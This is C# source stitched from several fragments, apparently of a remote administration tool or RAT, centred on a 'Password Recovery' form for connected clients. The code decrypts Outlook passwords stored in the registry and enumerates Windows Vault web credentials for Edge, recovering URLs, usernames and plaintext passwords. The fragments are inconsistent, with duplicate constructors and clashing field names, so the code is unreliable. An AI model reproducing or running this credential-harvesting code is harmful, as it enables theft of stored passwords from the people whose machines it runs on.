public FrmPasswordRecovery(Client[] connectedClients)
{
_clients = connectedClients;
foreach (Client client in _clients)
{
if (client == null || client.Value == null)
{
continue;
}
client.Value.FrmPass = this;
}
InitializeComponent();
Text = WindowHelper.GetWindowTitle("Password Recovery", _clients.Length);
txtFormat.Text = Settings.SaveFormat;
_noResultsFound = new RecoveredAccount()
{
Application = "No Results Found",
Url = "N/A",
Username = "******",
Password = "******"
};
}
private static List <RecoveredAccount> LoadFromRegistry(string baseRegKey)
{
var key = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Default);
key = key.OpenSubKey(baseRegKey);
var retVal = new List <RecoveredAccount>();
foreach (var accountKey in GetAccountKeys(key))
{
var acc = new RecoveredAccount
{
Application = "Outlook"
};
foreach (var valName in accountKey.GetValueNames())
{
if (valName.ToLower().Contains("password"))
{
var encVal = accountKey.GetValue(valName) as byte[];
acc.Password =
Encoding.Unicode.GetString(ProtectedData.Unprotect(encVal.Skip(1).ToArray(), null,
DataProtectionScope.LocalMachine)).Trim('\0');
}
else if (valName.ToLower().Contains("email"))
{
acc.Username = Encoding.Unicode.GetString(accountKey.GetValue(valName) as byte[]).Trim('\0');
}
}
retVal.Add(acc);
}
return(retVal);
}
private string ConvertToFormat(string format, RecoveredAccount login)
{
return(format
.Replace("APP", login.Application)
.Replace("URL", login.URL)
.Replace("USER", login.Username)
.Replace("PASS", login.Password));
}
public FrmPasswordRecovery(ClientMosaique client)
{
_client = client;
InitializeComponent();
client.value.frmPr = this;
//txtFormat.Text = ListenerState.SaveFormat;
_noResultsFound = new RecoveredAccount()
{
application = "No Results Found",
URL = "N/A",
username = "******",
password = "******"
};
}
public static List <RecoveredAccount> GetPasswords()
{
var retList = new List <RecoveredAccount>();
try
{
int count;
IntPtr items;
if (NtSuccess(VaultEnumerateVaults(0, out count, out items)))
{
for (var i = 0; i < count; i++)
{
IntPtr hVault;
if (NtSuccess(VaultOpenVault(items + i * Marshal.SizeOf(typeof(Guid)), 0, out hVault)))
{
IntPtr pItems;
int itemCount;
if (
NtSuccess(VaultEnumerateItems(hVault, 512 /* VAULT_ENUMERATE_ALL_ITEMS */, out itemCount,
out pItems)))
{
for (var j = 0; j < itemCount; j++)
{
var vaultItem =
(VAULT_ITEM)
Marshal.PtrToStructure(pItems + j * Marshal.SizeOf(typeof(VAULT_ITEM)),
typeof(VAULT_ITEM));
var acc = new RecoveredAccount();
// We're only interested in web credentials
if (vaultItem.SchemaId.Equals(new Guid(VaultWebCredentialId)))
{
acc.Application = "Microsoft Edge";
acc.URL = Marshal.PtrToStringUni(vaultItem.ResourceElement + 32);
acc.Username = Marshal.PtrToStringUni(vaultItem.IdentityElement + 32);
var pPasswVaultItem = IntPtr.Zero;
if (
NtSuccess(VaultGetItem(hVault, ref vaultItem.SchemaId,
vaultItem.ResourceElement,
vaultItem.IdentityElement, IntPtr.Zero, 0, 0,
ref pPasswVaultItem)))
{
var passwVaultItem =
(VAULT_ITEM)Marshal.PtrToStructure(pPasswVaultItem, typeof(VAULT_ITEM));
acc.Password =
Marshal.PtrToStringUni(passwVaultItem.AuthenticatorElement + 32);
VaultFree(pPasswVaultItem);
retList.Add(acc);
}
}
}
}
VaultCloseVault(hVault);
}
}
}
}
catch
{
}
return(retList);
}
